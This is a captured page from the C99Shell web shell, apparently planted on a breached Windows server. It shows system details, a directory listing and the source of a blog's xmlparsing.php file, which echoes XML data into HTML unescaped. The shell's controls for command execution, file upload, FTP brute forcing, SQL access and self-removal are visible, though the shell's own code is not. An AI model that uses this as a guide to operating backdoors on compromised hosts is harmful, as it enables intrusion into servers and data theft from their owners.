!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\blog\   drwxrwxrwx
Free 8.8 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xmlparsing.php (2.02 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include 'getContent.php';
    echo '<table width="100%" height="26" bgcolor="#FFFFCC">';
    if($_GET['linux']){
    echo '<tr><td><B>Note: This Site Using Macromedia Flash Player 8. There is currently no Flash Player 8 for linux</B></td>';
    } else {
    echo '<tr><td><a href="downloadFlash.html">Note: Install Macromedia Flash Player 8 and visit the Grapical version of this site</a></td>';
    }
    echo '</tr>';
    echo '</table>';
    print("<h2>". $title."</h2><BR>");
    $xml = simplexml_load_file('blog.xml');
    $blog =  $xml->blog;
    $length = sizeof($blog);
//Blog Entries --- do not modify this----------------------------------------------------------------
    echo '<table width="80%" border="0" align="left">';
    for($i=$length-1;$i>=0;$i--){
        $title = $xml->blog[$i]['title'];
        $entry = $xml->blog[$i]['entry'];
        $video = $xml->blog[$i]['video'];
        if($video !== 0){
            echo '<tr>';
               echo "<td><B>" .$title . "</B><BR>\n";
             echo $entry . "<BR>\n<BR></td>";
             echo '</tr>';

        }
    }
    echo '</table>';
//End Blog Entries-------------------------------------------------------------------------------------
//Start Profile Vars-----------------------------------------------------------------------------------
    echo '<table width="20%" border="0" bgcolor="#FFFFCC" align=right>';
    
    echo '<tr>';    
    echo '<td><B>My Profile</B> </td>';
      echo '</tr>';    
     echo '<tr>';    
    echo '<td><B>Name:</B> ' . $name . '</td>';
      echo '</tr>';    
    echo '<tr>';    
    echo '<td><B>Age:</B> ' . $age . '</td>';
      echo '</tr>';    
    echo '<tr>';    
    echo '<td><B>Ocupation:</B> ' . $ocupation . '</td>';
      echo '</tr>';    
    echo '<tr>';    
    echo '<td><B>Email:</B><a href="mailto:' . $email .  '" >' . $email . '</a></td>';
      echo '</tr>';    
    echo '<tr>';    
    echo '<td><B>Country:</B> ' . $country . '</td>';
      echo '</tr>';    
    echo '<tr>';    
    echo '<td><B>State:</B> ' . $state . '</td>';
      echo '</tr>';    
    echo '</table>';
    echo '<BR>';
    echo ' <P><a href="http://flogby.com">Get your own free flash blog</a></P>';
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--